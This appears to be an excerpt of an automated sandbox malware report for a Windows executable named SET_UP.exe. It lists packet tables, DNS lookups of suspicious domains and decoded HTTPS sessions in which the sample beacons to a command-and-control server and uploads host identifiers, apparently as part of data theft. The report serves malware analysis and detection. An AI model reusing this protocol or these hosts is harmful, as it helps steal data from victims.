                                                                                                                                                            Jan 7, 2025 14:48:35.607413054 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:35.607469082 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.607551098 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:35.608098984 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:35.608119965 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.451925039 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.452004910 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.453728914 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.453741074 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.454046011 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.455204964 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.499329090 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.714226961 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.714302063 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.714382887 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.714659929 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.714683056 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.714694977 CET49758443192.168.2.4185.161.251.21
                                                                                                                                                            Jan 7, 2025 14:48:36.714700937 CET44349758185.161.251.21192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:37.995044947 CET5595953192.168.2.4162.159.36.2
                                                                                                                                                            Jan 7, 2025 14:48:38.000561953 CET5355959162.159.36.2192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:38.000690937 CET5595953192.168.2.4162.159.36.2
                                                                                                                                                            Jan 7, 2025 14:48:38.005702019 CET5355959162.159.36.2192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:38.451484919 CET5595953192.168.2.4162.159.36.2
                                                                                                                                                            Jan 7, 2025 14:48:38.456618071 CET5355959162.159.36.2192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:38.456861973 CET5595953192.168.2.4162.159.36.2

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Jan 7, 2025 14:48:23.746438026 CET5592353192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:23.759577990 CET53559231.1.1.1192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:35.497946978 CET5886853192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:35.606009960 CET53588681.1.1.1192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:36.923531055 CET5823953192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:36.935179949 CET53582391.1.1.1192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:37.861615896 CET5687153192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:37.870748043 CET53568711.1.1.1192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:37.991096020 CET5363625162.159.36.2192.168.2.4
                                                                                                                                                            Jan 7, 2025 14:48:38.467614889 CET5287653192.168.2.41.1.1.1
                                                                                                                                                            Jan 7, 2025 14:48:38.495732069 CET53528761.1.1.1192.168.2.4

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Jan 7, 2025 14:48:23.746438026 CET192.168.2.41.1.1.10xdba5Standard query (0)skinfuzzerz.cyouA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 7, 2025 14:48:35.497946978 CET192.168.2.41.1.1.10x900fStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 7, 2025 14:48:36.923531055 CET192.168.2.41.1.1.10xc574Standard query (0)klipvumisui.shopA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 7, 2025 14:48:37.861615896 CET192.168.2.41.1.1.10xa417Standard query (0)dfgh.onlineA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 7, 2025 14:48:38.467614889 CET192.168.2.41.1.1.10xee9cStandard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Jan 7, 2025 14:48:23.759577990 CET1.1.1.1192.168.2.40xdba5No error (0)skinfuzzerz.cyou188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 7, 2025 14:48:23.759577990 CET1.1.1.1192.168.2.40xdba5No error (0)skinfuzzerz.cyou188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 7, 2025 14:48:35.606009960 CET1.1.1.1192.168.2.40x900fNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                            Jan 7, 2025 14:48:36.935179949 CET1.1.1.1192.168.2.40xc574Name error (3)klipvumisui.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 7, 2025 14:48:37.870748043 CET1.1.1.1192.168.2.40xa417Name error (3)dfgh.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                            Jan 7, 2025 14:48:38.495732069 CET1.1.1.1192.168.2.40xee9cName error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • skinfuzzerz.cyou
                                                                                                                                                            • cegu.shop

                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.449750188.114.97.34437268C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-07 13:48:24 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 8
                                                                                                                                                            Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                            2025-01-07 13:48:24 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:24 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=jh3880fj0qnntfhkqrkc6730ir; expires=Sat, 03 May 2025 07:35:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UP4VDDS%2Bx4%2BbpFEsv3NEK5mxMg15IwXe6skNHtvrvpbAYeQo82Sbch4UVZDOIB%2B8C%2FacaMyx%2BI71I9KvwcYgteCNsZrqh1Byjr7fzzFE6oBzILgr0JoIm0cpoXPoe1VjQ7xr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467bc6912c434-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1487&rtt_var=562&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=907&delivery_rate=1963685&cwnd=196&unsent_bytes=0&cid=c370679c420aa62d&ts=521&x=0"
                                                                                                                                                            2025-01-07 13:48:24 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                            2025-01-07 13:48:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.449751188.114.97.34437268C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-07 13:48:25 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 80
                                                                                                                                                            Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:25 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                                                            2025-01-07 13:48:25 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:25 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=7f94c0eb9jmkra27fvhbrqcgd8; expires=Sat, 03 May 2025 07:35:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hf73ft5oUhhmS69CwnRj6d%2FxzShyHwpCAanibcObYIctgwFXXxCUAVZhW36ks%2F9zggbh%2BlbZyuD4%2B3Zug89eGhNsYRw8GWsEbp%2FZkCJl2WpwNHLXCEhLScZ019z8H4QoGvP2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467c278c8c356-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1679&rtt_var=657&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=980&delivery_rate=1633109&cwnd=153&unsent_bytes=0&cid=4911e402b190b42c&ts=481&x=0"
                                                                                                                                                            2025-01-07 13:48:25 UTC244INData Raw: 34 36 63 0d 0a 79 49 55 69 41 6c 33 62 57 57 52 58 5a 42 77 6f 73 6e 53 6d 43 64 4a 53 31 61 70 53 44 43 36 79 6c 62 51 30 4f 39 39 6d 6e 57 65 7a 70 31 51 67 5a 2b 39 31 52 69 51 42 50 68 4c 55 46 63 70 36 74 33 37 33 79 7a 59 75 46 4e 54 30 32 45 64 65 38 30 54 72 43 75 71 2f 52 47 4d 78 71 44 78 49 64 51 46 6b 43 6f 67 76 33 53 75 33 50 50 65 51 63 47 6c 45 30 50 54 59 56 6c 71 30 43 65 30 4c 71 2b 31 4f 5a 54 57 2b 4f 67 41 32 43 48 46 4e 31 78 48 48 59 37 77 37 75 4d 49 2f 4c 67 4b 51 38 4d 34 57 41 66 30 72 2b 42 4f 70 79 45 4e 78 4e 76 6b 6b 53 43 78 47 65 55 61 51 54 6f 52 6f 74 7a 43 35 7a 44 5a 6e 52 74 72 39 30 46 64 66 74 52 62 30 41 61 44 74 51 47 59 30 74 44 4d 55 4f 77 4a 32 52 74 45 62 78 79 76 2b 63 4c 44
                                                                                                                                                            Data Ascii: 46cyIUiAl3bWWRXZBwosnSmCdJS1apSDC6ylbQ0O99mnWezp1QgZ+91RiQBPhLUFcp6t373yzYuFNT02Ede80TrCuq/RGMxqDxIdQFkCogv3Su3PPeQcGlE0PTYVlq0Ce0Lq+1OZTW+OgA2CHFN1xHHY7w7uMI/LgKQ8M4WAf0r+BOpyENxNvkkSCxGeUaQToRotzC5zDZnRtr90FdftRb0AaDtQGY0tDMUOwJ2RtEbxyv+cLD
                                                                                                                                                            2025-01-07 13:48:25 UTC895INData Raw: 51 63 44 59 4d 67 38 58 56 52 30 69 6f 43 65 38 44 36 76 67 4f 65 58 2b 2b 4e 30 5a 74 52 6e 5a 47 33 68 50 48 5a 4c 63 78 74 39 6f 2f 62 6b 2f 59 2f 39 4a 63 56 72 49 4c 38 51 2b 74 37 30 6c 6e 4d 4c 34 7a 41 44 6f 46 50 67 53 51 45 64 77 72 36 48 43 58 32 44 4e 74 57 4e 33 6d 6c 6b 6b 58 70 45 54 34 43 65 71 2f 41 47 59 78 75 44 59 47 4a 77 35 31 51 64 55 45 7a 32 4b 39 50 62 66 46 4f 6d 46 50 30 50 44 63 58 46 61 33 41 50 49 49 72 4f 64 41 49 48 48 35 50 42 35 31 58 6a 35 70 31 51 62 44 5a 36 5a 79 6a 59 67 76 49 46 57 51 38 4e 6f 57 41 66 30 4d 2b 67 61 70 37 45 39 6a 4e 37 49 70 42 69 63 41 63 30 2f 43 45 4d 46 6c 75 6a 4f 6c 77 6a 35 6f 54 39 6e 38 33 31 4e 65 75 55 53 78 52 61 33 2f 41 44 68 2f 6d 44 59 4e 4f 51 78 70 53 70 41 4a 69 6e 4c 77 4e 37
                                                                                                                                                            Data Ascii: QcDYMg8XVR0ioCe8D6vgOeX++N0ZtRnZG3hPHZLcxt9o/bk/Y/9JcVrIL8Q+t70lnML4zADoFPgSQEdwr6HCX2DNtWN3mlkkXpET4Ceq/AGYxuDYGJw51QdUEz2K9PbfFOmFP0PDcXFa3APIIrOdAIHH5PB51Xj5p1QbDZ6ZyjYgvIFWQ8NoWAf0M+gap7E9jN7IpBicAc0/CEMFlujOlwj5oT9n831NeuUSxRa3/ADh/mDYNOQxpSpAJinLwN7
                                                                                                                                                            2025-01-07 13:48:25 UTC1369INData Raw: 33 36 31 63 0d 0a 50 72 6e 50 4a 69 35 54 6e 75 36 57 55 56 58 39 58 4c 38 4b 70 65 68 49 59 44 36 39 4e 67 49 30 43 33 4a 44 30 78 72 49 59 37 30 38 73 38 63 34 5a 6b 2f 59 35 64 68 59 58 37 73 45 2b 6b 58 6b 70 30 64 34 66 2b 46 37 49 6a 73 52 61 6b 47 53 49 38 64 6c 76 6a 65 68 69 43 38 67 56 5a 44 77 32 68 59 42 2f 51 72 79 44 71 62 67 53 57 45 38 75 54 45 49 4f 67 78 32 51 74 41 62 78 57 43 34 4e 72 72 44 50 32 46 4c 32 50 54 61 55 31 53 2b 52 4c 46 46 72 66 38 41 4f 48 2b 63 4e 51 55 6b 46 7a 78 2f 30 78 6a 4b 62 4b 5a 77 71 49 59 70 4c 6b 76 63 74 34 34 57 55 37 6f 44 2b 77 69 67 35 45 52 6b 4d 72 59 79 44 7a 77 55 64 45 62 65 42 4d 6c 68 74 54 36 37 7a 54 39 75 54 64 48 35 33 46 30 5a 38 30 54 34 48 65 71 2f 41 45 38 79 71 53 6b 4d 50 68 63 38 66
                                                                                                                                                            Data Ascii: 361cPrnPJi5Tnu6WUVX9XL8KpehIYD69NgI0C3JD0xrIY708s8c4Zk/Y5dhYX7sE+kXkp0d4f+F7IjsRakGSI8dlvjehiC8gVZDw2hYB/QryDqbgSWE8uTEIOgx2QtAbxWC4NrrDP2FL2PTaU1S+RLFFrf8AOH+cNQUkFzx/0xjKbKZwqIYpLkvct44WU7oD+wig5ERkMrYyDzwUdEbeBMlhtT67zT9uTdH53F0Z80T4Heq/AE8yqSkMPhc8f
                                                                                                                                                            2025-01-07 13:48:25 UTC1369INData Raw: 72 36 48 43 59 79 79 5a 6b 44 4d 2b 35 7a 78 5a 65 73 55 53 6e 52 61 44 72 52 47 4d 7a 73 44 63 4c 4e 41 4a 35 52 39 51 57 77 6d 32 31 4d 62 7a 41 50 47 46 47 33 50 50 61 58 31 2b 78 42 2f 77 44 36 71 6b 41 5a 79 66 35 59 30 59 55 43 33 56 47 30 42 58 56 62 50 42 2b 39 38 59 32 62 67 79 49 34 63 5a 42 58 71 4a 4b 35 6b 57 74 36 77 41 34 66 37 4d 70 41 7a 73 43 64 45 2f 55 47 73 35 72 74 53 4b 2f 7a 6a 64 69 52 4e 58 34 30 46 4e 55 75 67 2f 38 46 37 6a 6b 52 47 34 7a 2b 58 56 47 4d 68 34 2b 45 70 41 7a 30 32 69 67 4e 72 53 49 4c 79 42 56 6b 50 44 61 46 67 48 39 42 50 45 4a 6f 65 42 4c 61 7a 75 39 4f 77 73 2b 43 48 42 44 33 42 37 49 62 4b 49 39 73 73 41 36 5a 30 6e 63 2b 74 56 45 57 72 78 45 73 55 57 74 2f 77 41 34 66 35 34 49 4d 52 5a 47 59 51 54 4a 56 73
                                                                                                                                                            Data Ascii: r6HCYyyZkDM+5zxZesUSnRaDrRGMzsDcLNAJ5R9QWwm21MbzAPGFG3PPaX1+xB/wD6qkAZyf5Y0YUC3VG0BXVbPB+98Y2bgyI4cZBXqJK5kWt6wA4f7MpAzsCdE/UGs5rtSK/zjdiRNX40FNUug/8F7jkRG4z+XVGMh4+EpAz02igNrSILyBVkPDaFgH9BPEJoeBLazu9Ows+CHBD3B7IbKI9ssA6Z0nc+tVEWrxEsUWt/wA4f54IMRZGYQTJVs
                                                                                                                                                            2025-01-07 13:48:25 UTC1369INData Raw: 39 2b 51 7a 59 55 65 51 36 4a 68 50 47 62 6f 49 76 31 33 71 34 45 68 6f 4d 62 6f 39 44 54 6b 4b 66 30 50 57 45 38 78 73 76 7a 65 2b 7a 7a 42 6f 58 74 66 36 33 31 5a 53 74 41 37 37 42 4b 47 6e 44 69 41 34 6f 58 74 65 64 54 52 35 58 4d 41 56 68 48 54 2b 4b 66 66 50 50 43 34 55 6b 50 72 45 56 31 79 76 41 50 41 4f 75 4f 78 47 59 44 71 72 50 41 6f 2f 43 58 31 43 33 52 58 4d 65 62 41 39 74 39 6f 69 61 45 66 65 74 35 67 57 58 71 56 45 70 30 57 62 38 45 73 67 49 50 63 69 52 6a 49 4b 50 68 4b 51 46 63 35 6d 76 69 4b 7a 7a 6a 74 74 51 74 6a 79 33 6c 4a 54 73 41 76 30 44 36 50 76 51 47 38 36 73 54 41 41 4f 77 64 34 52 74 31 57 69 69 75 33 4b 50 65 51 63 45 6c 57 33 66 48 42 52 32 79 36 42 4b 35 46 74 61 6c 5a 49 44 69 31 65 31 35 31 43 33 4a 41 33 52 50 41 59 37 63
                                                                                                                                                            Data Ascii: 9+QzYUeQ6JhPGboIv13q4EhoMbo9DTkKf0PWE8xsvze+zzBoXtf631ZStA77BKGnDiA4oXtedTR5XMAVhHT+KffPPC4UkPrEV1yvAPAOuOxGYDqrPAo/CX1C3RXMebA9t9oiaEfet5gWXqVEp0Wb8EsgIPciRjIKPhKQFc5mviKzzjttQtjy3lJTsAv0D6PvQG86sTAAOwd4Rt1Wiiu3KPeQcElW3fHBR2y6BK5FtalZIDi1e151C3JA3RPAY7c
                                                                                                                                                            2025-01-07 13:48:25 UTC1369INData Raw: 53 35 4c 33 4c 65 4f 46 6c 65 77 41 76 34 45 6f 75 39 41 5a 6a 57 39 4f 41 38 32 41 58 64 4d 32 78 58 4f 5a 4c 63 32 73 38 67 37 61 55 4c 57 38 74 31 66 47 66 4e 45 2b 42 33 71 76 77 42 47 48 4b 73 70 4e 44 73 46 5a 51 72 50 57 4e 30 72 74 7a 7a 33 6b 48 42 6c 52 4e 2f 6c 30 31 39 52 75 51 33 2f 41 61 44 71 52 32 41 36 74 44 34 43 4f 77 4a 35 53 74 77 5a 77 32 4f 2f 4e 4c 66 48 63 43 41 4d 31 2b 2b 57 44 68 6d 64 44 2b 6b 6b 70 4f 78 53 49 43 44 33 49 6b 59 79 43 6a 34 53 6b 42 6a 4e 61 72 67 2b 75 38 41 30 66 45 7a 62 2f 74 6c 58 56 72 30 48 2f 67 2b 69 39 55 5a 67 4e 4c 45 38 44 6a 45 49 62 45 76 66 56 6f 6f 72 74 79 6a 33 6b 48 42 66 57 74 66 77 32 52 52 77 75 68 2f 2b 44 36 6e 73 54 43 41 67 39 79 4a 47 4d 67 6f 2b 45 70 41 62 79 47 61 30 49 72 76 49
                                                                                                                                                            Data Ascii: S5L3LeOFlewAv4Eou9AZjW9OA82AXdM2xXOZLc2s8g7aULW8t1fGfNE+B3qvwBGHKspNDsFZQrPWN0rtzz3kHBlRN/l019RuQ3/AaDqR2A6tD4COwJ5StwZw2O/NLfHcCAM1++WDhmdD+kkpOxSICD3IkYyCj4SkBjNarg+u8A0fEzb/tlXVr0H/g+i9UZgNLE8DjEIbEvfVoortyj3kHBfWtfw2RRwuh/+D6nsTCAg9yJGMgo+EpAbyGa0IrvI
                                                                                                                                                            2025-01-07 13:48:25 UTC1369INData Raw: 69 33 33 56 68 63 76 41 6a 31 41 71 54 31 51 57 6f 7a 75 44 77 42 50 68 52 31 57 4e 73 65 78 32 57 34 4f 62 66 47 4d 47 39 42 30 4c 65 59 46 6c 36 6c 52 4b 64 46 6a 38 52 58 64 6a 58 37 47 42 45 6a 44 48 6c 47 78 68 33 46 61 4b 59 39 70 34 68 2b 4c 6c 33 58 35 70 59 4f 54 36 30 54 2b 42 72 6b 2f 67 42 6e 4d 2f 6c 6a 52 6a 34 4a 63 45 66 62 45 73 31 75 75 44 4f 79 7a 54 70 69 51 4e 48 2f 33 31 78 63 75 41 4c 31 42 71 54 6f 51 57 77 37 73 44 55 50 64 55 67 2b 54 63 68 57 6e 43 75 47 49 4c 44 51 50 58 34 4f 34 76 54 48 52 30 79 77 46 50 6c 48 68 65 52 4d 59 7a 71 2b 4b 30 59 71 53 47 63 4b 31 78 71 45 4d 2f 41 77 73 38 51 7a 61 55 4c 66 2b 74 6c 52 55 72 49 4f 38 52 65 6c 34 6b 68 73 4e 37 51 70 44 44 38 55 64 30 50 64 47 4d 78 35 73 33 44 35 69 44 64 32 44
                                                                                                                                                            Data Ascii: i33VhcvAj1AqT1QWozuDwBPhR1WNsex2W4ObfGMG9B0LeYFl6lRKdFj8RXdjX7GBEjDHlGxh3FaKY9p4h+Ll3X5pYOT60T+Brk/gBnM/ljRj4JcEfbEs1uuDOyzTpiQNH/31xcuAL1BqToQWw7sDUPdUg+TchWnCuGILDQPX4O4vTHR0ywFPlHheRMYzq+K0YqSGcK1xqEM/Aws8QzaULf+tlRUrIO8Rel4khsN7QpDD8Ud0PdGMx5s3D5iDd2D
                                                                                                                                                            2025-01-07 13:48:25 UTC1369INData Raw: 52 5a 34 4d 6b 39 42 4f 72 36 6b 74 73 41 59 63 75 42 54 73 49 65 56 7a 42 56 6f 6f 72 76 33 44 76 38 58 41 6d 44 4f 2b 35 6c 6b 34 5a 35 55 54 4b 42 71 54 70 52 33 59 75 39 42 73 4e 49 77 64 7a 51 64 78 55 78 57 61 67 4e 2f 65 47 63 47 67 4d 69 4b 65 59 46 6c 32 73 52 4b 64 56 2b 4c 77 56 4d 32 6a 70 61 52 6c 37 48 7a 35 63 6b 45 36 57 4a 66 41 69 39 35 42 77 4b 55 2f 43 35 64 42 56 54 37 35 44 77 54 75 4b 37 45 78 6a 4d 37 67 38 52 6e 74 47 63 51 71 49 4c 34 52 6f 6f 69 4c 34 32 53 5a 6a 58 4e 65 37 33 6b 64 55 73 55 53 78 52 65 62 6a 53 32 77 36 76 69 74 4a 4a 78 5a 31 52 73 5a 61 77 48 6e 77 66 76 66 5a 4f 32 46 65 33 76 43 5a 52 30 2b 77 46 50 77 41 72 61 74 49 63 54 4b 31 65 30 68 31 45 33 56 47 31 68 76 52 4a 4b 45 6d 74 4e 34 33 49 6b 54 42 2b 74
                                                                                                                                                            Data Ascii: RZ4Mk9BOr6ktsAYcuBTsIeVzBVoorv3Dv8XAmDO+5lk4Z5UTKBqTpR3Yu9BsNIwdzQdxUxWagN/eGcGgMiKeYFl2sRKdV+LwVM2jpaRl7Hz5ckE6WJfAi95BwKU/C5dBVT75DwTuK7ExjM7g8RntGcQqIL4RooiL42SZjXNe73kdUsUSxRebjS2w6vitJJxZ1RsZawHnwfvfZO2Fe3vCZR0+wFPwAratIcTK1e0h1E3VG1hvRJKEmtN43IkTB+t
                                                                                                                                                            2025-01-07 13:48:25 UTC1369INData Raw: 52 4f 64 46 38 71 64 31 59 7a 47 33 50 42 41 6b 53 31 68 4a 31 78 44 48 5a 61 63 68 39 34 5a 77 61 41 79 49 70 5a 67 57 58 61 78 45 70 31 58 34 76 42 55 7a 61 4f 6c 70 47 58 73 66 50 6c 79 51 54 70 63 6c 38 43 4c 33 6b 48 41 70 51 74 33 32 31 56 68 61 72 78 62 35 42 72 7a 6b 42 31 34 42 6e 44 59 4c 4d 41 68 35 64 4f 34 33 7a 6e 75 39 50 37 44 32 44 6c 6c 64 31 2b 65 55 63 46 71 72 42 37 39 4c 36 76 38 41 4f 48 2b 59 4d 52 59 34 43 58 6b 4b 6e 6c 62 41 4b 2b 68 77 6b 73 55 39 61 30 4c 58 74 66 64 63 53 62 41 4c 2b 45 58 6b 70 30 77 67 5a 2f 6b 36 44 43 55 4c 63 55 32 63 45 64 35 73 38 48 37 33 78 6e 41 32 44 4e 48 39 78 6c 74 57 75 6b 6a 35 43 36 53 6e 58 79 34 6d 2b 53 31 47 62 56 55 77 43 73 4a 57 6e 43 76 33 50 72 72 4a 4d 32 42 50 77 75 58 51 56 55 2b
                                                                                                                                                            Data Ascii: ROdF8qd1YzG3PBAkS1hJ1xDHZach94ZwaAyIpZgWXaxEp1X4vBUzaOlpGXsfPlyQTpcl8CL3kHApQt321Vharxb5BrzkB14BnDYLMAh5dO43znu9P7D2Dlld1+eUcFqrB79L6v8AOH+YMRY4CXkKnlbAK+hwksU9a0LXtfdcSbAL+EXkp0wgZ/k6DCULcU2cEd5s8H73xnA2DNH9xltWukj5C6SnXy4m+S1GbVUwCsJWnCv3PrrJM2BPwuXQVU+


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.449752188.114.97.34437268C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-07 13:48:26 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: multipart/form-data; boundary=R0WF7AGPFE
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 18116
                                                                                                                                                            Host: skinfuzzerz.cyou
                                                                                                                                                            2025-01-07 13:48:26 UTC15331OUTData Raw: 2d 2d 52 30 57 46 37 41 47 50 46 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a 2d 2d 52 30 57 46 37 41 47 50 46 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 30 57 46 37 41 47 50 46 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 52 30 57 46 37 41 47 50 46 45 0d 0a 43 6f 6e 74 65 6e 74
